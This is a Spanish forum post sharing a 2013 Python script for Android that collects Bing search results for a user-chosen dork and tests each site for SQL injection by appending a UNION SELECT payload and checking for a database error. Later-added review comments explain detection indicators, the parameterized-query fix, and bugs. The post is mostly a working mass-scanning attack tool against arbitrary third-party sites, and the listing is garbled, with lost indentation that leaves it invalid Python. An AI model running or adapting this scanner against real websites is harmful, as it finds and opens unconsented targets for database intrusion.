
[Python-Android] BingHack Tool 0.1

Un script sencillo en Python para Android que busca páginas vulnerables a SQLi usando Bing.

Unas imágenes en mi gloriosa tablet Argos.



El código:

Código:

#!usr/bin/python
#BingHack Tool 0.1
#Android Version
#(C) Doddy Hackman 2013

import android,urllib2,re

# NOTE(review): this module-level opener is never used by the functions in this
# listing (toma() builds its own Request and opener). The assignment below also
# targets `add_header`, which only creates a new attribute on the opener object;
# urllib2 openers keep their default header list in `addheaders`.
nave = urllib2.build_opener()
nave.add_header = [('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5')]

def toma(web) :
    """Return the body of an HTTP GET for *web*.

    The request carries a fixed User-Agent string claiming Firefox 3.0.5 on
    Windows NT 5.1.  No timeout is passed to ``open()`` and nothing is caught
    here, so network and HTTP errors propagate to the caller.

    Defender's note: both the search scraping and the injection probes in this
    script go through this function, so the same constant User-Agent appears on
    every request it generates in a server's access log.
    """
    peticion = urllib2.Request(web)
    peticion.add_header(
        'User-Agent',
        'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5',
    )
    abridor = urllib2.build_opener()
    respuesta = abridor.open(peticion)
    return respuesta.read()

def sql(webs):
 """Check each URL in *webs* for an error-based SQL injection symptom.

 For a URL containing "=", everything after the first "=" is dropped and the
 fixed suffix ``-1+union+select+1--`` is appended in its place.  The page is
 fetched with toma() and searched, case-insensitively, for the database error
 text "The used SELECT statements have a different number of columns".
 Each matching URL is added to the result as a "[SQLI] : <url>" line.

 Returns the accumulated text; it is empty when nothing matched.

 NOTE(review): the listing lost its indentation, so it is not clear whether
 the try block belongs inside the ``if`` or directly in the loop body; as
 shown, the function is not valid Python.

 Defender's note: a site is only reported when it echoes the raw database
 error to the client.  Parameterized queries remove the injection itself, and
 generic error pages remove the signal this check depends on.  The literal
 suffix above in a query string is a stable indicator of this script in
 access logs and WAF rules.
 """
 respuesta = ""
 for web in webs :
  # Only URLs that carry a query parameter are considered.
  if re.findall("=",web):
  # Keep the part before the first "=", i.e. only the first parameter is tested.
  web = re.split("=",web)
  web = web[0]+"="

  try:
    code = toma(web+"-1+union+select+1--")
    if (re.findall("The used SELECT statements have a different number of columns",code,re.I)):
    respuesta = respuesta + "[SQLI] : "+web+"\n"
  # Bare except: any fetch, HTTP or regex error is silently discarded, so a
  # failed request is indistinguishable from a negative result.
  except:
    pass
 return respuesta

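def limpiar(pag):
    """Return the items of *pag* without duplicates, keeping first occurrences.

    The input is not modified; a new list is returned.  Membership is tested
    against the output list, so items only need to support ``==`` (they do not
    have to be hashable).

    The listing as published had the body of the ``if`` at the same indent as
    the ``if`` itself, which is a syntax error; the nesting is restored here.
    """
    limpia = []
    for p in pag:
        if p not in limpia:
            limpia.append(p)
    return limpia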
 
def buscar(dork,count):
 """Collect result links from Bing for the query *dork*.

 Requests http://www.bing.com/search with ``first`` set to 10, 20, ... while
 the offset is <= int(count), pulls the href of every ``<h3><a href="...">``
 anchor out of the returned HTML, and returns the links de-duplicated by
 limpiar().

 NOTE(review):
 - ``count`` bounds the ``first`` offset, not a number of pages, although the
   prompt in menu() asks for "the number of pages to search".
 - int(count) is evaluated outside the try, so a non-numeric value raises
   ValueError to the caller.
 - ``s += 10`` comes after the fetch inside the try; if toma() raises, the
   bare except swallows the error with ``s`` unchanged and the loop repeats
   the same request without end.
 - ``respuesta`` is assigned but never used.
 - The listing's indentation was lost; as shown, the try/except bodies are
   not indented and the function is not valid Python.
 """

 respuesta = ""
 
 pag = []
 s = 10 
 
 while s <= int(count):
  try:
  code = toma("http://www.bing.com/search?q="+str(dork)+"&first="+str(s))
  # Non-greedy capture of the link target in each result heading.
  d = re.findall("<h3><a href=\"(.*?)\"",code,re.I)
  s += 10
  for a in d:
    pag.append(a)
  # Bare except: every error, including a failed fetch, is ignored.
  except:
  pass
 
 pag = limpiar(pag)

 return pag
 
# Handle to the Android scripting facade; every dialog in menu() is driven
# through it.  NOTE(review): the `android` module and the dialog* calls look
# like SL4A (Scripting Layer for Android) -- confirm.
aplicacion = android.Android()

def menu():
 """Show the main dialog ("Search", "About", "Exit") and run the chosen item.

 Search (item 0): asks for a dork and a count, runs buscar() on them, runs
 sql() on whatever buscar() returned, and shows the resulting report.  The
 URL list handed to sql() is not filtered or confirmed anywhere in this
 function.  Pressing "Done" re-enters menu() by calling it recursively.

 About (item 1): shows the copyright line; "Done" re-enters menu().

 NOTE(review): the listing lost its indentation (several ``if``/``else``
 bodies sit at the same indent as their header), so the function is not
 valid Python as shown and the extent of the ``else`` body is not certain.
 """

 aplicacion.dialogCreateAlert("BingHack Tool 0.1")
 aplicacion.dialogSetItems(["Search","About","Exit"])
 aplicacion.dialogShow()
 # This local name shadows the imported `re` module inside menu(); the
 # function does not use the module, so nothing breaks here.
 re = aplicacion.dialogGetResponse().result
 re2 = re["item"]
 
 if re2==0:
 
  red = aplicacion.dialogGetInput("BingHack Tool 0.1","Write the dork")
  dork = str(red[1])

  red = aplicacion.dialogGetInput("BingHack Tool 0.1","Write the number of pages to search")
  # Kept as a string; buscar() converts it with int() and does not catch a
  # ValueError, so non-numeric input ends the script with a traceback.
  paginas = str(red[1])

  aplicacion.dialogCreateSpinnerProgress("BingHack Tool 0.1","Searching ...")
  aplicacion.dialogShow()

  founds = ""
  rez = ""
  rtafinal = ""

  founds = buscar(dork,paginas)

  aplicacion.dialogDismiss()

  aplicacion.dialogCreateSpinnerProgress("BingHack Tool 0.1","Scanning ...")
  aplicacion.dialogShow()

  rez = sql(founds)

  # sql() returns "" when no URL matched.
  if len(rez) == 0 :
  rtafinal = "[-] Not Found"
  else :
  rtafinal = "[++] Pages Founds\n\n"
  rtafinal = rtafinal + rez
  rtafinal = rtafinal + "\n[++] Finished\n"

  aplicacion.dialogDismiss()

  aplicacion.dialogCreateAlert("BingHack Tool 0.1",rtafinal)
  aplicacion.dialogSetPositiveButtonText("Done")
  aplicacion.dialogShow()
 
  op = aplicacion.dialogGetResponse().result
  if op["which"] == "positive" :
  menu()

 if re2==1 :
  aplicacion.dialogCreateAlert("BingHack Tool 0.1","(C) Doddy Hackman 2013")
  aplicacion.dialogSetPositiveButtonText("Done")
  aplicacion.dialogShow()
  re3 = aplicacion.dialogGetResponse().result
  if re3["which"] == "positive" :
  menu()
 
  # NOTE(review): re3 is the dialog result indexed with ["which"] above, so
  # comparing it with 2 presumably never matches.  This looks like it was meant
  # to be a top-level `re2==2` check for the "Exit" item -- confirm.  As shown,
  # choosing "Exit" matches no branch and menu() simply returns.
  if re3==2:
  aplicacion.exit()

# Starts the UI as soon as the file is executed.  There is no
# `if __name__ == "__main__":` guard, so importing the module does the same.
menu()

# The End ?

Eso es todo.
